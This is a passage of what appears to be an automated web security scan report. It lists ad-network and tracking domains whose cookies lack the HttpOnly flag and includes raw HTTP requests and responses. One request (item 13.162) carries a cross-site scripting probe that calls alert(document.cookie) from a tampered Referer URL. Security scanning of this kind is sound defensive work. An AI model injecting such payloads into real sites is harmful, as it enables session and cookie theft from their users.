rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1; expires=Wed, 13-Jul-2011 11:02:23 GMT; path=/; domain=.rubiconproject.com
rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C4%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C0%2C2%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C0%2C1%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C; expires=Wed, 13-Jul-2011 11:02:23 GMT; path=/; domain=.pixel.rubiconproject.com
put_1185=4325897289836481830; expires=Fri, 12-Aug-2011 11:02:23 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.151. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Wed, 12-Jun-2013 11:02:25 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.152. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:15:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.153. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:29 GMT; Path=/
pf=rJtRH_Zk3Crgq3XrNxM5uHEqiyLWvlhwjvnX8-W77V4x5j1rYCkdVRP2UaaYhxkUxhx5ALNZJagJ4MhMImSgOyt6QGZFXBO1NvJY7BqIKHZhvO5ig4C655IEHyqLyfEUFlkMz3gvg7tzZ65ieMRHYYmASOVQBnblqHIXcnFE8uEYYUySe878HncxgdgOdj92jl0rNHL5EpMmdOK3tFHbYcKYx7giuKqnJGUA2_kwifla82yQ3ARkjvlrTKVFQLW_VUJXNqxcPjaaIsmLsBYi_IFuP6ulkaWyvPg7ZCq6J8Sm58lMqwfI2GvVIEz4WwfISPKpzpOADOvDXTfruF0alDxO4DpGIPHqQsHlcKTQP_6t_mnmmMSqRxtrra7L27k8He5W6LJiN_5zagqr-v56q6vwUm7lgp1ObdHANNybCRR3ZMlqCglAFAZZpg_M4EsDXsaip8JZMWQiFy7084RgdBxS4jS6IstDV4pJ8-n_-6W6QeiG4mh_YsXE5a8jCvgqlMsemxKiaCnXl_GqgNvYs0B3SVwVOr3C6PTRdRykLl2iOA0QIyniWC75o4jPDSb6baJelTYQciNR7KUdBGuKphvrAV6VQlu0Lcrpp_zSva1EtN-BuZEVp80k4PmkN_gFT-0aLPu67tXdfrImPEaGxrLIgqy0HrJSnCOmesnJHs-iyClqPR6i_k6wNNO3DELQr_uIdOrnpxEKEs-Pk70xbyVMkCnwjQLr3BhyqdpEqAmw1EG4HhJkcxQudw6muujB96NlR8cKCFB5b8yH-pAF-mxRgFAjFQHwBahwKdWu4ip8fc5C4_glMUDVwxYyhOp8tzU93SuQ7nqi9tHAkdJN5ShSi2_S0ZBzvsnlEtnNkBKRFHfA7aVFPwCQo5sX_MQSkbAmFVP5zHlSQkeurscnCCa3KSLwD6FHUmhYkRD3kZ2DDxNnHBh_vaMBlaGMOoGiOP9lVr3_n1bFKy78DHYEOoRkkyOYsQ0PbNgsm751fELW-fiq__5eo7ylPnldi2Bi3SK-TvN7k9vrOkW_afxQblylfBQR4N29DHAz6s-YyJmoHE8ApAwt-kHxIo-kX64rftT8TEPyntWofHiv9gsugLEkwQaet3sIO9GGUlvQx5D5kYn6xS0x3Os1_-TyxwIMVeEuUt36_YfGhy_wZQGCzqHs9-R7LSr4Do5Mz8ot93SyloXowYUrzIwjbiWVu0QENn7QjXgaQvvqTx85Mwdm4yDTB6Zn1F_DCC3c80LxMwD3FWPqzrOYdv9QuGsosjGMc_hL3i14FfV2kUxpXbXvdNe0m-E7pddLAWU1WSKM0t6oIHj0ZyVfxzasgiFBZa4PEoPenkETQGmKRNO3UUUIMcPfmJjMAO_zDX3Rgpr4fJx5b7T_BE1CYU53q09WJSHhYfaXNQ9ylSf0-ANS40O_0EDXFQMkdTiFRKAitR0ED9nnbf1aAiZ1mXyIuy6pv27WjNkjULv8DSLA8OtfInB5hP32cnVXyr_f-8VDR4bfJ5pB3KpP7reQd0b5fGjrZoX6DdoTW0lCYYEnb4vKPJGv4Q; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.154. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:15:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.155. http://rs.gwallet.com/r1/pixel/x420r9190030 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x420r9190030

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=L4-e5U0-I3U0; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.156. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.ugo.com
Path:	/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26FAF9AB85158BD1-60000180C01100BD[CE]; Expires=Sat, 11 Jun 2016 11:24:07 GMT; Domain=.ugo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.157. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A23";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:03 GMT
audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1510],\"a\":[]},\"8\":{\"f\":1309071600,\"e\":1309071600,\"s\":[545],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:03 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.158. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segs.btrll.com
Path:	/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Mon, 11-Jun-2012 11:32:52 GMT; path=/; domain=.btrll.com
DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5snGQ; expires=Wed, 12-Jun-2013 11:32:52 GMT; path=/; domain=.btrll.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.159. http://server.cpmstar.com/brilig.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.cpmstar.com
Path:	/brilig.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=1307964221; domain=.server.cpmstar.com; expires=Wed, 13-Jul-2011 11:23:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brilig.aspx HTTP/1.1
Host: server.cpmstar.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USER_ID=%9f%15q%3eK%0b(%10%8b%2f%fb%cdW%bb%96; i=173.193.214.243; is=9C9B95BCB68F9548052DD44E9CB01B745BB6387A; n1=0,332,2750,54001,1307963914,0

Response

HTTP/1.1 200 OK
Cache-Control: private,no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: d=1307964221; domain=.server.cpmstar.com; expires=Wed, 13-Jul-2011 11:23:41 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADM DEVa PSAa PSDa OUR OTR IND UNI NAV STA"
Date: Mon, 13 Jun 2011 11:23:41 GMT
Content-Length: 238
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</tit
...[SNIP]...

13.160. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ServedBy=logger016; path=/; domain=.krxd.net; expires=Sun, 11-Dec-2011 00:45:49 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5;PATH=/;DOMAIN=.krxd.net;EXPIRES=Sun, 11-Dec-2011 00:45:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.161. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ServedBy=logger016; path=/; domain=.krxd.net; expires=Sun, 11-Dec-2011 00:45:58 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5;PATH=/;DOMAIN=.krxd.net;EXPIRES=Sun, 11-Dec-2011 00:45:58 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1648
Date: Mon, 13 Jun 2011 11:19:39 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:32 GMT; path=/
Set-Cookie: pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:32 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...

13.163. http://sis.amazon.com/iu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sis.amazon.com
Path:	/iu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

apn-user-id=bfda6b1d-debe-4c19-866c-4db6f0ebc0c5; Domain=amazon.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.164. http://srv.clickfuse.com/pixels/delete.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv.clickfuse.com
Path:	/pixels/delete.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

criteo=deleted; expires=Sun, 13-Jun-2010 11:21:24 GMT; path=/; domain=.clickfuse.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.165. http://stgapi.choicestream.com/instr/csanywhere.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stgapi.choicestream.com
Path:	/instr/csanywhere.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 11:18:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.166. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A42";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT
rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jun+20+04%3A02%3A42+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A42";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jun+20+04%3A02%3A42+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

13.167. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1307964062; domain=.mathtag.com; path=/; expires=Tue, 12-Jun-2012 11:21:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.168. http://syndication.mmismm.com/tntwo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

U=Koc9bi_JRn2Zr7JGWUhM0g--; expires=Sun, 12-Jun-2016 17:01:37 GMT; path=/; domain=.mmismm.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.169. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307964067+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
camp_freq_p1="eJzjkuF4PZFNgEli8dPr71kUGDXug2gDJouDD4E0lwjH5PesAowSFxo2A2UZNBgMGCwYgKJvgXoYJc6iif5eCFI7F0307ksWoOiMDw0oojvnswpkSXx6jywqyjHzB4tAK7PEotOowru+sghMZJQ4t/z/O2ThWUAzrjFKXHn57x2y0WdfsAowS+x7eg9F9OMrsON2XUARnbURJHrr+0GEKAApL05s"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
io_freq_p1="eJzjEudYEi/ALLH46fX3LAoMGgwGTBYHHwLZXMIcj2MEGCUuNGyGSjBYMAAFL4QCBeeiCT4NAArO+NCAJCjCsS1U4ACTxKf3qKI/AgVamSUWnUYVvRUoMJFR4tzy/++Qjd0cA3TZvqf3UASPglw1d9cFFMHucKDgre8HEYIAmzQ6HA=="; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.170. http://tag.admeld.com/ad/js/195/fsv/728x90/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/195/fsv/728x90/ros

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; expires=Mon, 11-Jul-2011 11:01:33 GMT; path=/; domain=.tag.admeld.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/195/fsv/728x90/ros?01AD=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA&01RI=D54777EA22B9F46&01NA=&url= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=CT-1

Response

13.171. http://tags.bluekai.com/site/2312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2312

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4df5ee2b; expires=Wed, 15-Jun-2011 11:02:03 GMT; path=/; domain=.bluekai.com
bk=ePFVBn9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:02:03 GMT; path=/; domain=.bluekai.com
bkc=KJpMTsHQrB4vyve2f3LF/y1e9yKxlNis0Z29TXKy/wMEZOARIJTy1rM/F/Epr5eTr7vGd12oeYMXEtMXMtMXvi+DwQzSdTzkvFXesFXos7Iisuod9CG48eXR78mnQVcU59Rs1uHIuM13lfWOkxIiRUy8UQSsYaPsawTqBPH8Ac6ywQ95eDqz; expires=Sat, 10-Dec-2011 11:02:03 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.172. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=rWc5iq9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:18:54 GMT; path=/; domain=.bluekai.com
bkc=KJhqpzU9LcAp9TwzobIIM9y1evrO4m+VPcT1YTvF0zw96OUw0weZ/Tv4/RlvE6wMQdEeI/k9RkTl9XwMeN22ZSOXAe01pXcJyc9wSndtmTCbWnIheJU4Q1RcbR4hopWp1w92RVExAUAJ8lmCXUUkDwZ46hCxIJdxIOdHIaPV3cymBwTwuNEIOpEIDpEIHeBDdQx6wLCd1eT71e8tEV5QWWwiopuMXC6qDwAQsLSUTtPQiaOkHmsdDDmPO2AcTy19WS83Zx==; expires=Sat, 10-Dec-2011 11:18:54 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.173. http://tags.bluekai.com/site/2736 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2736

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=v7chM9kKkhsd8JkA; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
bkc=KJh56qXvxUWDOdeFhUe51agGjAe8+0o1cLOrDavbKxveiVHCRSW1ULYiqeSE+fOQDBJN5zFG2Tr4b8pk7eb5zp35pLR9e7LQbfQNezOsK1Zzua/l9ofUy+L+Rwb813vVdz3jWeOrSgQ2wc5iNOSp7a5riqYS9Y4qg4ZIk7PkwxQzh4fzd51FwKCu287kFwnze6EmsFnhbXXszXsA4kGQ5oQ4pn60+zfXvkcqpO4ZVjab0ipFDybv4IyVxwEwfuaN+DX+Lf/jOrGoM4iVo7V8EdABcqObC9==; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
bko=KJhMWsHQ6wg6NjKHxjVUQDac83VF9115v/ra/DT/yZJiu/uvLEnG1E1y1n2TfLFsA1XmREW0KwwYVmoxaQ5egYYWhzxyixlYTZ/T0Xl9Xwl8zN2ZCGkxaiBe9QXex20Ej69hnEMgWMIWhziQyy+Mu4/h1nynFQVDkxV09MjKOfGw9sOC1SR=; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
bkw5=KJhE+VOQzmvz0Sesh1e9y8eFhze9yMYBIR1k98eX9uR8gWYAgCyMQ0jDqHyM9T1Rx0kxnH1eJ85M9ymxEskZRWQs3Zx907XO0QLybBLp1e9Y5U81RtO/HjnCjpYW07yY0rxi049hmWakxcRV/1A/1AHYjETe2Hxi0RQyCWBkxsbrxj/Hj4Y90GeX6Kf9yJ9Z1j1CCxWA2+/O/F1DvewPauMWLJCCehw/wtvIYO5yK99hp60ypcX4iBXMQshrCGzI/OvicN+GPRaJA1XCFGuTshvv68i87GO/wi9J9J8DHkA=; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.174. http://tags.bluekai.com/site/3113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3113

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4df5f41e; expires=Wed, 15-Jun-2011 11:27:26 GMT; path=/; domain=.bluekai.com
bk=gJEI1xqRtYLBvF/1; expires=Sat, 10-Dec-2011 11:27:26 GMT; path=/; domain=.bluekai.com
bkc=KJh56q2nxkWDOdeF2xU84wGwvWoewlOGM4HOTmeT/LuC/RQQG3PdGWAyCpEYk+gS7//Vjy7KWBcRf+RFvzJOyuUG7O5cf77eFjzw2lFwmUYnSSY2qNYRE91eGWQIpZA4hq0lQn7wwsetSkOg4Ll2LSi2EzLtFh54mXOosEMJMy/c4GG2nZZdhU0NG5tBZKrnh07QQrj8VCoad5Mma1Gf7MSdad4Ggoy6KnuXsEw7hRD1Ln+izsd8KhUv7Oz46cqq9S3kE8gUHmjfzDMpoWmQxKRXKXFE8gpTM+pF9lUn4ArqXI/cLAFN4zFwb23zaddudyXFeKGdf6WYqrELZFqnL7qkc1oH4fJe537ITmq4UJ22tBurBnE8awXOeYbP99==; expires=Sat, 10-Dec-2011 11:27:26 GMT; path=/; domain=.bluekai.com

